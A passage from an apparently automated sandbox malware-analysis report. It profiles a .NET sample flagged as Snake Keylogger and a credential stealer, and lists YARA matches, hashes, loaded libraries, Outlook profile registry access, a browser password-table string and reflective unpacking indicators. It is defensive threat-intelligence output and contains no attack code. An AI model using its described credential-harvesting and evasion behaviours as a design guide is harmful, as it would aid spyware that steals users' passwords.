          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713673493.0000000007A50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710598493.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4165208883.0000000000422000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4165351139.0000000000967000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeBinary or memory string: OriginalFilenameJcWm.exeF vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, eUt9fLwjWkj1AUhmiI.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, eUt9fLwjWkj1AUhmiI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, eUt9fLwjWkj1AUhmiI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.bac0000.4.raw.unpack, eUt9fLwjWkj1AUhmiI.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.bac0000.4.raw.unpack, eUt9fLwjWkj1AUhmiI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.bac0000.4.raw.unpack, eUt9fLwjWkj1AUhmiI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.bac0000.4.raw.unpack, sCesRoL9fdy7v4Nm93.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.bac0000.4.raw.unpack, sCesRoL9fdy7v4Nm93.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, sCesRoL9fdy7v4Nm93.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, sCesRoL9fdy7v4Nm93.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, sCesRoL9fdy7v4Nm93.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, sCesRoL9fdy7v4Nm93.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, eUt9fLwjWkj1AUhmiI.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, eUt9fLwjWkj1AUhmiI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, eUt9fLwjWkj1AUhmiI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.logJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMutant created: NULL
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029BE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeVirustotal: Detection: 37%
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeReversingLabs: Detection: 27%
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: JcWm.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: Binary string: JcWm.pdbSHA256 source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Form4.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.bac0000.4.raw.unpack, eUt9fLwjWkj1AUhmiI.cs.Net Code: YRamDpFUrd System.Reflection.Assembly.Load(byte[])
